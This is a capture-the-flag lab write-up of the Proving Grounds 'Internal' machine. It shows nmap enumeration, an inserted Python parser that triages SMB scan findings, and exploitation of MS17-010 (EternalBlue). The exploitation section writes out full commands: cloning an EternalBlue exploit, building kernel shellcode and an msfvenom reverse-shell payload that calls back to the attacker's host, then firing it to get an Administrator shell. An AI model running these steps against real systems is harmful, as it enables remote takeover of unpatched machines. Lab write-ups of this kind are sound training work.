PG - Internal

In this walkthrough, we will be going through the Internal room from Proving Grounds. This room is rated as Easy on the platform and consists of exploiting the MS17-010 (EternalBlue) vulnerability to get root on the system. So, let's get started without any delay.

Machine Info:

Title: Internal
IP address: 192.168.166.40
Difficulty: Easy
OS: Windows
Description: Internal is an Easy rated Windows machine that is vulnerable to the MS17-010 (EternalBlue) exploit.

Enumeration:

  • I started off with my regular nmap aggressive scan and found multiple open ports. Some interesting ones were 135 (RPC), 139/445 (SMB), 3389 (RDP) and 5357 (HTTP).

$ sudo nmap -A 192.168.166.40
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-10 22:06 IST

Nmap scan report for 192.168.166.40
Host is up (0.20s latency).
Not shown: 987 closed ports
PORT      STATE    SERVICE            VERSION
53/tcp    filtered domain
135/tcp   open     msrpc              Microsoft Windows RPC
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds       Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open     ssl/ms-wbt-server?
|_ssl-date: 2024-02-10T16:38:38+00:00; 0s from scanner time.
5357/tcp  open     http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open     msrpc              Microsoft Windows RPC
49153/tcp open     msrpc              Microsoft Windows RPC
49154/tcp open     msrpc              Microsoft Windows RPC
49155/tcp open     msrpc              Microsoft Windows RPC
49156/tcp open     msrpc              Microsoft Windows RPC
49157/tcp open     msrpc              Microsoft Windows RPC
49158/tcp open     msrpc              Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/10%OT=135%CT=1%CU=30488%PV=Y%DS=4%DC=T%G=Y%TM=65C7A6
OS:C9%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TS=7)OPS(O1=M54ENW8ST1
OS:1%O2=M54ENW8ST11%O3=M54ENW8NNT11%O4=M54ENW8ST11%O5=M54ENW8ST11%O6=M54EST
OS:11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80
OS:%W=2000%O=M54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R
OS:=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7
OS:(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=EAEB%RUD=G)
OS:IE(R=N)

Network Distance: 4 hops
Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 4h00m01s, median: -1s
|_nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ba:a1:8b (VMware)
| smb-os-discovery: 
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: internal
|   NetBIOS computer name: INTERNAL\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-02-10T08:38:31-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-10T16:38:30
|_  start_date: 2023-02-18T02:15:24

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   199.51 ms 192.168.45.1
2   199.54 ms 192.168.45.254
3   199.55 ms 192.168.251.1
4   200.44 ms 192.168.166.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.75 seconds

  • I started my enumeration with SMB but got nothing back.

smbclient -L 192.168.166.40

smbmap -H 192.168.166.40

[Screenshot: SMB enumeration output]

  • Next, I ran the nmap smb-vuln-ms17-010 script against SMB port 445 to test for MS17-010 (EternalBlue) and got a positive hit.

$ sudo nmap -p445 --script smb-vuln-ms17-010 192.168.166.40
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-10 22:24 IST
Nmap scan report for 192.168.166.40
Host is up (0.21s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 3.07 seconds
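
As an added example (not from the original post), here is a small Python parser that reads the "Host script results" block nmap printed in the two scans above and turns the security-relevant lines into prioritised findings: SMBv1 still negotiable, message signing disabled or not required, and an smb-vuln-ms17-010 result in the VULNERABLE state together with its CVE. The sample input is constructed from the scan output above; Finding, parse_script_results, assess_smb and triage are names chosen for this example.

```python
"""Triage SMB findings from nmap NSE output (added example, not from the original post).
Groups the "Host script results" lines by NSE script and turns the security-relevant
ones into prioritised findings a defender can act on."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: the relevant lines copied from the two scans above.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 4h00m01s, median: -1s
| smb-os-discovery:
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   Computer name: internal
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
"""

HEADER_RE = re.compile(r"^\| ([A-Za-z][\w-]*):\s*$")      # "| smb-security-mode:"
ONELINE_RE = re.compile(r"^\|_?([A-Za-z][\w-]*): (.+)$")  # "|_clock-skew: mean: ..."
BODY_RE = re.compile(r"^\|[_ ]\s+(\S.*?)\s*$")             # "|     State: VULNERABLE"
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class Finding:
    script: str
    severity: str            # "critical", "medium" or "info"
    summary: str
    cve: Optional[str] = None


def parse_script_results(text: str) -> Dict[str, List[str]]:
    """Return {script name: [result lines]} from nmap's '|'-prefixed output."""
    scripts: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:                                   # multi-line result header
            current = m.group(1)
            scripts.setdefault(current, [])
            continue
        m = ONELINE_RE.match(line)
        if m:                                   # single-line "|_name: value"
            scripts.setdefault(m.group(1), []).append(m.group(2).strip())
            current = None
            continue
        m = BODY_RE.match(line)
        if m and current is not None:           # indented body line
            scripts[current].append(m.group(1))
    return scripts


def assess_smb(scripts: Dict[str, List[str]]) -> List[Finding]:
    """Map the parsed script output to findings, most severe first."""
    findings: List[Finding] = []
    for item in scripts.get("smb-os-discovery", []):
        if item.startswith("OS:"):
            findings.append(Finding("smb-os-discovery", "info", item))

    # smb-security-mode negotiates SMBv1, so any result means the SMBv1
    # dialect (the one MS17-010 targets) is still enabled on the host.
    v1 = scripts.get("smb-security-mode", [])
    if v1:
        findings.append(Finding("smb-security-mode", "medium", "SMBv1 dialect enabled"))
    if any(i.startswith("message_signing:") and "disabled" in i for i in v1):
        findings.append(Finding("smb-security-mode", "medium", "SMBv1 message signing disabled"))
    if any("not required" in i.lower() for i in scripts.get("smb2-security-mode", [])):
        findings.append(Finding("smb2-security-mode", "medium", "SMB2 message signing not required"))

    vuln = scripts.get("smb-vuln-ms17-010", [])
    if "State: VULNERABLE" in vuln:
        m = CVE_RE.search(" ".join(i for i in vuln if i.startswith("IDs:")))
        findings.append(Finding("smb-vuln-ms17-010", "critical",
                                "MS17-010 unpatched: remote code execution over SMBv1",
                                m.group(0) if m else None))

    rank = {"critical": 0, "medium": 1, "info": 2}
    findings.sort(key=lambda f: rank[f.severity])   # stable sort keeps insertion order within a tier
    return findings


def triage(text: str) -> List[Finding]:
    return assess_smb(parse_script_results(text))


if __name__ == "__main__":
    for f in triage(SAMPLE_NMAP_OUTPUT):
        print(f"[{f.severity:8}] {f.script}: {f.summary}" + (f" ({f.cve})" if f.cve else ""))
```

Feeding it a full nmap normal-output file (nmap -oN) works the same way, since only the '|'-prefixed script lines are examined; a host where MS17-010 has been patched (or SMBv1 removed) produces no critical finding, and the remaining medium findings point at the SMB signing settings worth hardening.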

Exploitation & Getting root:

  • I checked for EternalBlue exploits other than the Metasploit one. I found one on Exploit-DB, but it didn't seem to work, so I used a different one from GitHub.

[Screenshot: EternalBlue exploit]

  • Set up the exploit requirements using the commands below. They create a Python 2 virtual environment with pyenv and install the required impacket version into it. After that, we download the exploit we are using from GitHub, build the shellcode using nasm and msfvenom, and concatenate both shellcode blobs into one file as the exploit requires. Finally, fire the exploit at the target, specifying its IP address.

# Activate a virtual environment

pyenv virtualenv 2.7.18 eternalblue 
pyenv activate eternalblue 
pip install impacket==0.9.22

# Clone the exploit

git clone https://github.com/worawit/MS17-010.git


# Create shell code

nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin

msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.45.207 --platform windows -a x86 --format raw -o sc_x86_payload.bin

cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin


# Fire the exploit

python2 eternalblue.py 192.168.166.40 sc_x86.bin

[Screenshot: firing the exploit]

  • We got a shell back as Administrator on our netcat listener, captured the root flag and marked the machine as complete.

[Screenshot: got root]

[Screenshot: proof flag]

Conclusion:

So that was "Internal" for you. We started off with a regular nmap scan and found multiple open ports: 135 (RPC), 139/445 (SMB), 3389 (RDP) and 5357 (HTTP). Next, we ran a targeted nmap vulnerability scan with the smb-vuln-ms17-010 script and found that the host is vulnerable to MS17-010 (EternalBlue). We looked online for a related exploit (the Exploit-DB one did not work, so we used one from GitHub) and fired it at the target to get root. On that note, I will take your leave and will meet you in the next one. Till then, "Happy hacking".
